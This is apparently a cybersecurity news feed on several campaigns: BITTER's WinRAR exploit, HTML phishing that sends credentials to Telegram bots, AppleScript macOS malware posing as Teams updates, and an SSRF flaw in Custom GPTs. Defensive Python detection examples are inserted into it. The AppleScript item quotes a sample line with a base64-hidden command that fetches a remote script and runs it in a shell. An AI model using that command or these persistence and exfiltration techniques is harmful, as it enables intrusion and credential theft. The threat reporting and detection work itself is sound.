• The advanced persistent threat group APT-C-08, also known as Manlinghua or BITTER, has launched a sophisticated campaign targeting government organizations across South Asia by exploiting a critical directory traversal vulnerability in WinRAR.

    Security researchers have identified the group’s first operational use of CVE-2025-6218, a flaw affecting WinRAR versions 7.11 and earlier that allows attackers to breach file system boundaries and execute malicious code on compromised systems.

    APT-C-08 maintains established relationships with South Asian governments and has historically focused on stealing sensitive information from government agencies, the military-industrial complex, overseas institutions, and universities.

    The threat group has demonstrated proficiency in weaponizing malicious documents as attack entry points, meticulously crafting socially engineered payloads designed to bypass security awareness.

    This latest campaign represents a significant escalation, leveraging a vulnerability that remains difficult to patch due to WinRAR’s inconsistent update mechanisms across enterprise environments.

    Security analysts and researchers identified the malware campaign by discovering weaponized RAR archives containing deceptively named files, such as “Provision of Information for Sectoral for AJK.rar.”

    The malicious archive exploits CVE-2025-6218 by leveraging specially crafted file paths that contain spaces after directory traversal sequences, a technique that circumvents WinRAR’s path normalization.

    When victims extract the archive, the exploit deposits a malicious Normal.dotm macro file into the Windows template directory at C:\Users\[username]\AppData\Roaming\Microsoft\Templates, establishing persistence through Microsoft Word’s automatic template loading mechanism.

    Infection Mechanism and Code Execution

    The attack chain demonstrates a sophisticated understanding of Windows system architecture.

    Upon extraction, the malicious Normal.dotm file (MD5: 4bedd8e2b66cc7d64b293493ef5b8942) runs when the victim opens any Word document, triggering VBA macros that execute the “net use” command to map remote directories to the local machine.

    Subsequently, the macro launches winnsc.exe from the remote server, establishing command execution capabilities.

    This two-stage infection approach ensures that opening the initial document triggers the infection without raising suspicion, allowing operators to maintain stealth while establishing persistent remote access.

    The exploit’s low difficulty, combined with its high success rate, has prompted security communities to recommend immediate patching of all WinRAR installations and implementing application allowlisting to restrict macro execution in Microsoft Office templates.

    Organizations handling sensitive government information should prioritize threat detection monitoring for suspicious network mapping activities and macro-based indicators of compromise.


    The post APT-C-08 Hackers Exploiting WinRAR Vulnerability to Attack Government Organizations appeared first on Cyber Security News.


  • A sophisticated phishing campaign has emerged, targeting organizations across Central and Eastern Europe by impersonating legitimate global brands to deceive users into surrendering their login credentials.

    The attack utilizes self-contained HTML files delivered as email attachments, eliminating the need for external server hosting or suspicious URLs that traditional security systems typically detect.

    Once opened, these attachments present convincing fake login pages for brands including Microsoft 365, Adobe, WeTransfer, FedEx, and DHL, creating a seamless user experience designed to bypass conventional email security controls.

    The attack methodology demonstrates a clear understanding of regional business practices.

    Threat actors distribute phishing emails posing as legitimate customers or business partners, requesting quotations or invoice confirmations with RFQ-themed filenames such as RFQ_4460-INQUIRY.HTML.

    This targeted approach focuses on industries with regular procurement workflows, including agriculture, automotive, construction, and education sectors, primarily in the Czech Republic, Slovakia, Hungary, and Germany.

    Cyble security analysts identified that the campaign’s success relies on embedded JavaScript within HTML attachments that captures credentials and transmits them directly to attacker-controlled Telegram bots rather than traditional command-and-control servers.

    Upon execution, victims encounter a carefully replicated login interface displaying authentic-looking brand assets over blurred background images for added legitimacy.

    Campaign Overview

    The credential capture mechanism functions by reading form field values and constructing API requests to send stolen data directly through the Telegram Bot API.

    Technical analysis reveals two distinct implementation approaches among analyzed samples. The first variant implements CryptoJS AES encryption for obfuscation while capturing email addresses, passwords, IP addresses, and user-agent information before redirecting victims to legitimate company domains.

    Campaign Overview (Source - Cyble)

    The second sample employs more advanced anti-forensics techniques, blocking keyboard combinations including F12, Ctrl+U/S/C/A/X, and right-click context menus to prevent code inspection and analysis.

    The exfiltration function demonstrates technical sophistication by utilizing the native Fetch API for cleaner code implementation rather than jQuery dependencies.

    The JavaScript constructs POST requests containing harvested credentials sent via HTTPS to api.telegram.org/bot endpoints with hardcoded bot tokens and chat IDs embedded directly in the payload.

    This approach deliberately avoids suspicious network patterns while maintaining operational resilience through decentralized bot infrastructure.

    Organizations should prioritize deploying HTML attachment controls and implementing content inspection policies to block or sandbox potentially malicious HTML files before delivery to end users.

    Security teams are advised to hunt for api.telegram.org POST activity originating from client systems and conduct retroactive threat hunts for identified indicators to assess whether credentials have been compromised.
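    The hunt recommended above is straightforward to script against proxy or egress logs. The added example below (not code from the article or from Cyble) parses a constructed, simplified proxy log format of the form "timestamp client method url status", keeps only POST requests to api.telegram.org whose path starts with a bot token, and reports the affected clients with the token redacted so the hunt output itself does not spread a credential. The log lines and tokens are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Constructed log format: "<ts> <client-ip> <method> <url> <status>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)
# Telegram Bot API paths look like /bot<bot_id>:<secret>/<apiMethod>.
TOKEN_RE = re.compile(r"^bot(?P<id>\d+):(?P<secret>[A-Za-z0-9_-]+)$")


def redact_token(bot_id, secret):
    """Keep the numeric bot id (useful for correlation) but hide the secret part."""
    return f"{bot_id}:{'*' * 8}"


def hunt_telegram_exfil(log_lines):
    """Return one finding per POST to a Telegram bot endpoint seen in the log."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["url"])
        if url.hostname != "api.telegram.org":
            continue
        segments = url.path.strip("/").split("/")
        token_m = TOKEN_RE.match(segments[0]) if segments else None
        if token_m is None:
            continue  # not a bot endpoint (e.g. a file download path)
        hits.append({
            "ts": m["ts"],
            "client": m["client"],
            "api_method": segments[1] if len(segments) > 1 else "",
            "bot": redact_token(token_m["id"], token_m["secret"]),
        })
    return hits


def affected_clients(hits):
    """Distinct client addresses that posted to a bot endpoint, for the retroactive hunt."""
    return sorted({h["client"] for h in hits})


# Constructed sample log: two client posts to bot endpoints, plus benign noise.
SAMPLE_LOG = [
    "2025-11-12T09:14:03Z 10.20.4.17 POST https://api.telegram.org/bot123456789:AAEXAMPLETOKENxxxxxxxx/sendMessage 200",
    "2025-11-12T09:14:05Z 10.20.4.17 GET https://learn.microsoft.com/en-us/ 200",
    "2025-11-12T09:15:11Z 10.20.4.33 POST https://api.telegram.org/bot987654321:AAOTHERTOKENyyyyyyyy/sendDocument 200",
    "2025-11-12T09:16:00Z 10.20.4.40 GET https://api.telegram.org/bot111:AAA/getMe 200",
    "2025-11-12T09:16:30Z 10.20.4.40 POST https://api.telegram.org/file/bot111:AAA/photos/x.jpg 404",
]

if __name__ == "__main__":
    findings = hunt_telegram_exfil(SAMPLE_LOG)
    for f in findings:
        print(f)
    print("clients to review:", affected_clients(findings))
```

    The real log format will differ (Zeek http.log, Squid access.log, a SIEM export), so only LOG_RE needs adapting; the host, path and token checks are the part that carries the detection. Treat any client in the output as having potentially submitted credentials and reset them.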


    The post New Phishing Attack Leverages Popular Brands to Harvest Login Credentials appeared first on Cyber Security News.


  • Since Apple removed the popular “right-click and open” Gatekeeper override in August 2024, threat actors have shifted their tactics to deliver malware on macOS. Among emerging techniques, attackers are increasingly leveraging AppleScript (.scpt) files to bypass security controls and distribute credential stealers often disguised as legitimate software updates from popular applications such as Zoom and […]

    The post AppleScript Used to Deliver macOS Malware Disguised as Zoom & Teams Updates appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • SecureVibes, an innovative AI-native security system designed for modern applications, has unveiled a comprehensive vulnerability scanner that leverages Anthropic’s Claude AI to deliver intelligent security analysis across eleven programming languages. The tool represents a significant advancement in automated vulnerability detection by combining a multi-agent architecture with sophisticated threat modeling capabilities. Advanced AI-Powered Security Analysis The […]

    The post SecureVibes Introduces Multi-Language Vulnerability Scanner Powered by Claude AI appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Microsoft has confirmed it is investigating a significant issue affecting Microsoft Teams for Education, which is particularly impacting users’ ability to access critical features such as assignments and grades.

    The problem, which initially appeared limited to administrators in Europe, has since expanded to potentially affect all users with educational accounts worldwide.

    The outage stems from backend infrastructure challenges within Teams’ processing systems. Microsoft first acknowledged the issue on November 12, 2025, stating that affected admins in the European region were unable to open or load assignments and grades.

    This disruption has broader implications for educators and students relying on the platform for daily collaboration and academic management.

    As the investigation progressed, Microsoft updated its status to reveal that the issue extends beyond admins to any user holding a Microsoft Teams Educational account.

    This escalation underscores the platform’s centrality in modern remote learning environments, where even brief downtimes can halt lesson planning, grading, and student interactions.

    To address the problem, Microsoft engineers are actively restarting key backend components that power Teams’ services. These restarts aim to restore processing capabilities and mitigate the ongoing impact.

    Users experiencing difficulties are directed to the Microsoft 365 admin center for real-time updates under incident identifier TM1185134. There, detailed timelines, affected services, and mitigation steps are available, helping IT administrators track resolution efforts.

    The timing of this incident is particularly unfortunate, coinciding with the mid-semester period when educational institutions heavily depend on digital tools.

    Microsoft Teams, part of the broader Microsoft 365 suite, serves millions of users globally, with education-specific features integrated deeply into school workflows.

    While the company has not specified a root cause, such as a software glitch, server overload, or external factor, past Teams outages have often involved high-traffic scenarios or configuration errors in cloud infrastructure.

    Microsoft emphasizes that its teams are working around the clock to resolve the issue, with preliminary signs of improvement expected as restarts complete.

    In the interim, affected users are advised to monitor the admin center and consider alternative tools for urgent tasks. This event highlights ongoing challenges in maintaining reliable cloud-based educational platforms, especially amid rising demands post-pandemic.

    As more details emerge under TM1185134, educators and IT professionals should prepare contingency plans to minimize academic disruptions. Microsoft has committed to a full post-incident review to prevent future occurrences.


    The post Microsoft Investigating Teams Issue that Disables Users from Opening Apps appeared first on Cyber Security News.


  • Windows LNK files remain a preferred vector for attackers seeking to establish initial access on target systems. Recently, security researchers identified a sophisticated MastaStealer campaign that exploits these shortcut files to deliver a full-featured C2 beacon while simultaneously turning off critical endpoint protections. The infection begins with a spear-phishing email containing a ZIP archive with […]

    The post MastaStealer Exploits Windows LNK to Launch PowerShell and Bypass Defender appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Every day, security teams face the same problem—too many risks, too many alerts, and not enough time. You fix one issue, and three more show up. It feels like you’re always one step behind. But what if there was a smarter way to stay ahead—without adding more work or stress? Join The Hacker News and Bitdefender for a free cybersecurity webinar to learn about a new approach called Dynamic Attack


  • Threat actors continue to evolve their techniques for bypassing macOS security controls, shifting away from traditional attack vectors that Apple has systematically patched.

    Following Apple’s removal of the “right-click and open” Gatekeeper override in August 2024, attackers have identified and weaponized a new delivery mechanism using compiled AppleScript files with deceptive naming conventions.

    These .scpt files are increasingly being leveraged to distribute malware that masquerades as legitimate software updates, including fake Zoom and Microsoft Teams installers.

    The emerging threat centers on .scpt files that open directly in Script Editor.app by default, creating an attractive attack surface for threat actors.

    When users double-click these files, the application displays a user-friendly interface with social engineering prompts encouraging execution.

    The malware operators strategically embed malicious code after extensive blank lines to hide the actual payload from casual inspection.

    By simply clicking the “Run” button or pressing Cmd+R, users inadvertently execute the script even if it has been flagged by Gatekeeper quarantine protections, effectively circumventing Apple’s security mechanisms.

    Fake Chrome Update Example (Source - Pepe Berba)

    Security analysts at Moonlock Labs and Pepe Berba identified this technique gaining prominence in recent months, discovering sophisticated campaigns that previously appeared in advanced persistent threat operations.

    Pepe Berba noted that while AppleScript files themselves are not new, the proliferation of samples using this technique represents a concerning trend, particularly as commodity malware families like MacSync Stealer and Odyssey Stealer have adopted the methodology.

    This represents a classic case of advanced techniques trickling down from state-sponsored actors to common cybercriminal operations.

    Technical structure

    The technical structure of these scripts employs several clever deception tactics.

    A sample analyzed reveals AppleScript code such as set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY=" followed by do shell script "open -g " & quoted form of teamsSDKURL.

    Execution flow (Source - Pepe Berba)

    This command structure opens malicious URLs in the background while presenting legitimate-looking update prompts to the user.

    The filenames themselves serve as the primary deception layer, with variants including “MSTeamsUpdate.scpt,” “Zoom SDK Update.scpt,” and “Microsoft.TeamsSDK.scpt.”
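    The three traits described in this section (payload pushed below a long run of blank lines, a background "open -g" launched through do shell script, and a base64 blob smuggled in a URL query parameter) are all visible in the script source, which is what a triage tool should look at. The added example below (not code from the article, Moonlock Labs or Pepe Berba) scores a decompiled AppleScript source for exactly those traits; it assumes you have already recovered the source text from the .scpt file, for instance with macOS's osadecompile. The script sample is constructed and its base64 payload decodes to a harmless echo.

```python
import base64
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"""https?://[^\s"']+""")
# Twenty or more consecutive blank (or whitespace-only) lines is well beyond normal formatting.
BLANK_RUN_RE = re.compile(r"(?:\r?\n[ \t]*){20,}")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
OPEN_BG_RE = re.compile(r'do shell script\s+"open\s+-g')


def decode_if_base64_text(value):
    """Return the decoded text when value is base64 for printable text, else None."""
    if not B64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    if all(ch.isprintable() or ch in "\n\t" for ch in text):
        return text
    return None


def _query_pairs(query):
    # parse_qsl would turn '+' into a space and break base64, so split by hand.
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            yield key, value


def triage_applescript_source(source):
    """Return a list of human-readable findings for one decompiled AppleScript."""
    findings = []
    if BLANK_RUN_RE.search(source):
        findings.append("code hidden below a long run of blank lines")
    if OPEN_BG_RE.search(source):
        findings.append("background 'open -g' launched via do shell script")
    for url in URL_RE.findall(source):
        parts = urlsplit(url)
        for key, value in _query_pairs(parts.query):
            decoded = decode_if_base64_text(value)
            if decoded is not None:
                findings.append(
                    f"query parameter '{key}' on {parts.netloc} decodes to text: {decoded!r}"
                )
    return findings


# Constructed sample: a friendly prompt, 40 blank lines, then the real work.
_HARMLESS = base64.b64encode(b"echo hello from a constructed sample").decode()
SAMPLE_SCRIPT = (
    'display dialog "A Teams SDK update is available." buttons {"Update"}\n'
    + "\n" * 40
    + 'set teamsSDKURL to "https://docs.example.test/platform/?v=' + _HARMLESS + '"\n'
    + 'do shell script "open -g " & quoted form of teamsSDKURL\n'
)

if __name__ == "__main__":
    for finding in triage_applescript_source(SAMPLE_SCRIPT):
        print("-", finding)
```

    None of the three traits is malicious on its own, which is why the function returns findings for an analyst rather than a verdict; two or more together on a file named after a software update is a strong reason to quarantine it and inspect the URL's target.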

    The persistence and detection evasion capabilities of these attacks deserve particular attention.

    Many .scpt files currently maintain zero detections on VirusTotal, providing attackers with significant operational runway before security vendors implement detection signatures.

    The files often arrive through phishing emails or compromised websites offering software updates, targeting users seeking legitimate version upgrades.

    This attack vector presents a significant challenge for macOS security, as it exploits user trust in familiar application names while leveraging native system tools that legitimate users regularly interact with.

    Organizations must educate users about verifying software updates through official channels and implement endpoint detection solutions capable of monitoring AppleScript execution patterns.


    The post Hackers Weaponize AppleScript to Creatively Deliver macOS Malware Mimic as Zoom/Teams Updates appeared first on Cyber Security News.


  • A cybersecurity researcher has uncovered a server-side request forgery (SSRF) vulnerability in OpenAI’s ChatGPT. The flaw, hidden in the Custom GPTs feature, allowed attackers to potentially access sensitive cloud infrastructure secrets, including Azure management API tokens. Disclosed through OpenAI’s bug bounty program, the issue was swiftly patched, but it underscores the persistent dangers of SSRF […]

    The post Hackers Exploit SSRF Flaw in Custom GPTs to Steal ChatGPT Secrets appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Widespread reports suggest that a major law enforcement operation targeting notorious malware infrastructure has disrupted the Rhadamanthys stealer control panel, prompting urgent security alerts. In a significant development within the cybersecurity community, reports indicate that German law enforcement authorities may have seized control of the main Rhadamanthys stealer infrastructure, marking a potentially significant blow against one of […]

    The post Rhadamanthys Stealer Servers Reportedly Seized; Admin Urges Immediate Reinstallation appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
